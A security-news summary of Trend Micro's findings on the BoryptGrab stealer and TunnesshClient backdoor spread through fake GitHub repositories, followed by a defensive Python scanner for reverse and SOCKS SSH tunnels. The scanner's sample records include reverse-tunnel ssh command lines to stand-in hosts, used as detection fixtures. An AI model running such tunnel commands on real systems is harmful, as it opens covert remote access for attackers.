March 9, 2026

Over 100 GitHub repositories distribute BoryptGrab stealer, Trend Micro reports

Over 100 GitHub repositories have been found distributing a new information stealer known as BoryptGrab, according to Trend Micro's report. The malware is designed to harvest sensitive data from browsers and cryptocurrency wallets, along with various system files. Since late 2025 it has been packaged in ZIP archives posing as free software tools, part of a broader trend in which attackers use SEO-optimized GitHub repositories to deliver malware disguised as legitimate tools. Notably, certain versions of BoryptGrab include the TunnesshClient backdoor, which enables remote command execution through SSH tunneling and gives the attackers persistent remote access to infected hosts.

BoryptGrab: BoryptGrab is a C/C++ information stealer targeting Windows systems; it performs VM detection and anti-analysis checks and attempts to elevate its privileges. It extracts data from numerous browsers (handling Chrome's credential encryption), cryptocurrency wallets, and browser extensions, and collects system details, screenshots, and files from Telegram and Discord. The stealer has been spread since late 2025 via fake GitHub repositories masquerading as software tools.
Trend Micro: Trend Micro is a global cybersecurity company specializing in threat intelligence, detection solutions, and research on evolving cyber threats. It recently published predictions for 2026 highlighting industrialized cybercrime and AI-driven scams. In this case, Trend Micro investigated and reported on the BoryptGrab stealer distributed through deceptive GitHub repositories.
TunnesshClient: TunnesshClient is a Python-based backdoor that uses reverse SSH tunnels for stealthy command-and-control communication. It acts as a SOCKS5 proxy, executes shell commands, manages files, and transfers folders to the attacker’s server. Deployed by certain BoryptGrab variants, it provides persistent remote access in this campaign.
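As an added defender-side example (not code from Trend Micro or the article), the scanner below reads constructed process-creation records and flags ssh.exe invocations carrying the reverse (-R) or dynamic/SOCKS (-D) forwarding flags that a reverse-SSH-tunnel channel like the one described for TunnesshClient relies on. The record format, paths, hosts and the assumption that the Python-based backdoor spawns the OpenSSH client are all constructed for the example; the report does not state how the tunnel is implemented.

```python
import shlex

# Constructed sample process-creation records (not real telemetry), one per line:
# pid|parent_image|image|command_line
SAMPLE_EVENTS = """\
4112|C:\\Users\\u\\AppData\\Local\\Temp\\FreeTool\\python.exe|C:\\Windows\\System32\\OpenSSH\\ssh.exe|ssh.exe -N -R 2222:127.0.0.1:22 -R 1080 tunnel@198.51.100.23 -p 443
4113|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\OpenSSH\\ssh.exe|ssh.exe admin@10.0.0.5
4120|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\OpenSSH\\ssh.exe|ssh.exe -L 8080:intranet:80 admin@10.0.0.5
4121|C:\\Users\\u\\AppData\\Local\\Temp\\FreeTool\\python.exe|C:\\Windows\\System32\\OpenSSH\\ssh.exe|ssh.exe -D 1080 -N -oStrictHostKeyChecking=no tunnel@203.0.113.9
"""
# OpenSSH client options that consume the next token as their value
OPTS_WITH_ARG = {"-R", "-L", "-D", "-p", "-o", "-i", "-l", "-F", "-J", "-W",
                 "-b", "-c", "-e", "-m", "-S", "-w", "-E", "-I", "-B"}

def parse_ssh_args(cmdline):
    """Split an ssh command line into ({flag: [values]}, positional args)."""
    tokens = shlex.split(cmdline)[1:]  # drop the image name
    flags, positional, i = {}, [], 0
    while i < len(tokens):
        tok = tokens[i]
        if tok in OPTS_WITH_ARG and i + 1 < len(tokens):  # '-R 1080' form
            flags.setdefault(tok, []).append(tokens[i + 1])
            i += 2
        elif tok.startswith("-"):  # '-N', or attached value as in '-oKey=val'
            flags.setdefault(tok[:2], []).append(tok[2:])
            i += 1
        else:  # user@host, or a remote command
            positional.append(tok)
            i += 1
    return flags, positional

def scan(records):
    """Flag ssh runs whose flags build a reverse (-R) or dynamic/SOCKS (-D) forward,
    the shape a reverse-SSH-tunnel C2 channel needs; plain -L is not flagged."""
    findings = []
    for line in records.strip().splitlines():
        pid, parent, image, cmdline = line.split("|", 3)
        if not image.lower().endswith("ssh.exe"):
            continue
        flags, positional = parse_ssh_args(cmdline)
        reasons = []
        if "-R" in flags:
            reasons.append("reverse forward -R " + ",".join(flags["-R"]))
        if "-D" in flags:
            reasons.append("dynamic/SOCKS forward -D " + ",".join(flags["-D"]))
        if reasons and "-N" in flags:
            reasons.append("-N: tunnel only, no remote command")
        if reasons:
            findings.append((int(pid), parent, positional[0] if positional else "", reasons))
    return findings
```

Running `scan(SAMPLE_EVENTS)` returns the two records that open a reverse or SOCKS forward (pids 4112 and 4121) together with their destination and the flags that triggered the match, while the ordinary interactive and -L sessions pass. The parent image of each finding is returned so an analyst can weigh an ssh client launched from a scripting runtime in a temporary directory against one launched from the desktop shell.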

```json
{
  "Stealer Techniques": "Harvests browser data through Chromium helpers and targets wallet extensions, exfiltrating the data to attacker-controlled servers.",
  "Distribution Tactics": "Attackers distribute the malware via deceptive download pages and GitHub repositories, disguising it as legitimate software tools.",
  "Backdoor Capabilities": "TunnesshClient facilitates proxying traffic, remote file operations, and command execution using SSH tunneling."
}
```

Source: SecurityWeek
